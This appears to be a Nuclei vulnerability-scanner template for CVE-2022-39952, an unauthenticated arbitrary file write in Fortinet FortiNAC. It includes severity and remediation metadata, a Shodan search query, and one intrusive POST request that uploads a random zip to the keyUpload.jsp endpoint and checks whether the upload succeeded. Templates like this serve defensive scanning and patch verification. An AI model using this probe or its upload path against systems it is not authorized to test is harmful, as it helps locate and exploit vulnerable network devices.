65 lines
2.3 KiB
YAML
65 lines
2.3 KiB
YAML
id: CVE-2022-39952
|
|
|
|
info:
|
|
name: Fortinet FortiNAC - Arbitrary File Write
|
|
author: dwisiswant0
|
|
severity: critical
|
|
description: |
|
|
Fortinet FortiNAC is susceptible to arbitrary file write. An external control of the file name or path can allow an attacker to execute unauthorized code or commands via specifically crafted HTTP request, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7.
|
|
remediation: Upgrade to 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above.
|
|
reference:
|
|
- https://fortiguard.com/psirt/FG-IR-22-300
|
|
- https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/
|
|
- https://github.com/horizon3ai/CVE-2022-39952
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-39952
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-39952
|
|
cwe-id: CWE-73,CWE-668
|
|
epss-score: 0.88424
|
|
epss-percentile: 0.9839
|
|
cpe: cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: fortinet
|
|
product: fortinac
|
|
shodan-query: title:"FortiNAC"
|
|
tags: fortinet,fortinac,cve,cve2022,fileupload,rce,intrusive
|
|
variables:
|
|
boundaryId: "{{hex_encode(rand_text_alphanumeric(16))}}"
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/configWizard/keyUpload.jsp"
|
|
|
|
body: |
|
|
--{{boundaryId}}
|
|
Content-Disposition: form-data; name="key"; filename="{{to_lower(rand_text_alphanumeric(8))}}.zip"
|
|
|
|
{{randstr}}
|
|
--{{boundaryId}}--
|
|
|
|
headers:
|
|
Content-Type: "multipart/form-data; boundary={{boundaryId}}"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "zipUploadSuccess"
|
|
- "SuccessfulUpload"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100ea4e1c83a6ac5010fe74f85ecf04846d1cec37bfaaf75432c4a1ec85e7bf49d8022070971021671aa3f6ee10845bcffea7783cfead589bffb53ae93842e80425f31e:922c64590222798bb761d5b6d8e72950 |